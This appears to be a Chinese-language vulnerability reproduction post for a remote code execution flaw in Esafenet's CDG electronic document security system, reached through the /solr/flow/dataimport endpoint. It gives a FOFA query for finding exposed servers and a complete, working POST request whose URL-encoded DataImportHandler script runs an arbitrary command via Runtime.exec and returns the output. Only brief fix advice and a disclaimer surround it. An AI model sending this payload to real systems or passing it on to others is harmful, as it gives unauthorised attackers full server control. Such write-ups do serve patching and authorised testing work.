亿赛通电子文档安全管理系统 RCE漏洞

2023-11-04

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、 产品简介

亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。

二、 漏洞概述

亿赛通电子文档安全管理系统/solr/flow/dataimport接口处存在远程代码执行漏洞,未经授权的攻击者可通过此漏洞执行任意指令,从而获取服务器权限。

三、 复现环境

FOFA:app=“亿赛通-电子文档安全管理系统”

在这里插入图片描述

四、 漏洞复现

burp抓包发送的POC数据

POST /solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22执行的命令%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1383.67 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: your-ip
 
<?xml version="1.0" encoding="UTF-8"?>
    <RDF>
        <item/>
    </RDF>

burp成功回显截图

在这里插入图片描述
ceye后台查看

在这里插入图片描述

小龙POC检测:

说明一下,由于监管强制要求,POC要等护网后才能开放

小龙POC传送门: 小龙POC工具

在这里插入图片描述

五、 修复建议

设置安全组仅对可信地址开放
升级至安全版本

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

亿赛通电子文档安全管理系统 RCE漏洞 的相关文章

随机推荐

  • C# 把函数作为参数传入另一个函数

    C 把函数作为参数传入另一个函数 如果我们需要设计一个Compute函数 它是用来计算的 参数类型依次是int 函数 int 比如 Compute 2 Add 3 应该返回5 因为我们传入的是一个做加法的函数 Compute 2 Mul 3
  • C++ include guard

    参考 https www geeksforgeeks org include guards in c include guard 也叫 header guard macro guard file guard 它的作用就是防止头文件被重复包含
  • Windows Nginx 环境搭建安装配置详细教程 2020(最新)

    Windows Nginx 安装配置详细教程 2020 最新 文章导读 Nginx 下载 Nginx 安装 WIndows Nginx 环境搭建 Nginx 配置 Nginx 问题解决 Nginx 下载 nginx 1 19 0 Nginx
  • 如何计算网络号

    IP 地址的网络号和主机号是通过子网掩码来计算的 具体计算方法如下 例如 有一个C类地址为 192 9 200 13 其缺省的子网掩码为 255 255 255 0 IP 地址 192 9 200 13 转换为二进制 11000000 00
  • 猎豹CEO傅盛:ChatGPT将带来交互革命和生产力革命

    本文为混沌 一 思维创新嘉年华大课笔记第二篇 授课老师 傅盛 猎豹移动董事长兼CEO 猎户星空董事长 编辑丨混沌商业研究团队 一直以来 我认为创业是时代 机会和个人努力三者的结合 是有方法论的 通过不断地迭代才能够持续找到成功的路径 6年前
  • oracle全组件安装,Oracle text组件安装

    1 目标 在数据库中 安装Oracle Text组件 970473 1 MOS文档ID 2 组件相关视图 查询验证 查询DB中的组件 视图 USER REGISTRY 注册 COMP ID 组件标识 COMP NAME 组件名称 VERSI
  • 开源配置中心和注册中心: Nacos 限流最佳实践

    Nacos 限流最佳实践 Tomcat 限流 Nginx 限流 限制访问速率 限制并发连接数 黑名单 总结 作者 风卿 Nacos 社区 committer Nacos 限流最佳实践 Nacos自开源以来 版本迭代速度很快 已经发布了0 9
  • Lost connection to MySQL server during query很无语的错误原因以及解决办法

    前言 最近在写mysql实验 在配置审计环境 搞了好几天各种bug 今天总算发现问题了 万万没想到竟是授权的问题 泪emo 是这样的 我在数据库建了表 create database auditdb use auditdb create t
  • 在CMD命令行中切换到管理员权限模式

    1 打开CMD 2 输入 runas noprofile user Administrator cmd 3 输入Administrator账户的密码 必须设置密码 PS 可以不是Administrator账户 只要是具有管理员权限的账号都可
  • 《我所知道的软件测试自动化》—关键字驱动的过去和未来

    鉴于这个系列写的内容是希望帮助 大多数2 3年 工作经验 急切盼望提升自身能力的 tester找到捅破 测试自动化 窗户纸的办法 所以木有高深内容 高手们请直接飘过 呵呵 1 关键字驱动 的由来 说到 关键字驱动 和 测试自动化 就不能不提
  • AWS介绍(详细好理解)

    一 什么是云计算 像水 电 煤一样的使用IT资源 云计算 指按需交付的IT资源和应用程序 通过互联网使用 按使用量付费 按需使用 高弹性 超大规模 云计算已经成为新常态 二 什么是AWS AWS是亚马逊集团的一家提供云计算服务的公司 AWS
  • flex 布局 子元素不设置宽高,高度撑满父元素的问题

    在 flex 布局中 我们通过 align items 来控制元素在交叉轴上的对齐方式 它可能取5个值 flex start 交叉轴的起点对齐 flex end 交叉轴的终点对齐 center 交叉轴的中点对齐 baseline 项目的第一
  • 使用Python分析处理数据并用pyecharts进行可视化

    使用Python分析处理数据并用pyecharts进行可视化 一 数据文件 二 使用pyecharts进行可视化 1 各岗位占比饼图 2 各岗位平均起薪柱状图 3 各城市招聘量柱状图及平均薪资折线图组合 4 各城市岗位薪资分布热力图 5 数
  • 结构体与枚举类型

    欢迎来到C语言的世界 博客主页 卿云阁 欢迎关注 点赞 收藏 留言 本文由卿云阁原创 本阶段属于锻体阶段 希望各位仙友顺利完成突破 首发时间 2021年1月18日 希望可以和大家一起完成进阶之路 作者水平很有限 如果发现错误 请留言轰炸哦
  • [转]QNX与Linux_OS系统对比比较:车载安全与移动博弈

    锋影 email 174176320 qq com 如果你认为本系列文章对你有所帮助 请大家有钱的捧个钱场 点击此处赞助 赞助额0 1元起步 多少随意 无人驾驶汽车是汽车界的 目标 而这个 目标的实现离不开车载操作系统的完善 智能科技潮以强
  • 深度学习中Batch Size的大小对训练过程的影响

    最近在调参 看了一下batch size这个参数的意义以及对训练过程的影响 故记录一下自己学习到的内容 batch size大小的直接影响很明显 影响一个epoch中需要迭代iteration的次数以及完成每个epoch所需的时间 从训练的
  • 记录一下CausalDiscoveryToolbox的R包安装历程

    R的安装和配置文件的修改 使用python包CausalDiscoveryToolbox时 对R包是有依赖的 首先需要安装R R完成安装后 修改CausalDiscoveryToolbox的配置文件 对于anaconda来说 配置文件为Li
  • fedora 改变启动顺序

    vi boot grub menu lst
  • 阿里云对象存储OSS打造私人图床&私人云存储(1年仅9元)

    阿里云对象存储OSS打造私人图床 私人云存储 1年仅9元 阿里云对象存储OSS Object Storage Service 是一款海量 安全 低成本 高可靠的云存储服务 提供99 9999999999 12个9 的数据持久性 99 995
  • 亿赛通电子文档安全管理系统 RCE漏洞

    亿赛通电子文档安全管理系统 RCE漏洞 一 产品简介 二 漏洞概述 三 复现环境 四 漏洞复现 小龙POC检测 五 修复建议 免责声明 请勿利用文章内的相关技术从事非法测试 由于传播 利用此文所提供的信息或者工具而造成的任何直接或者间接的后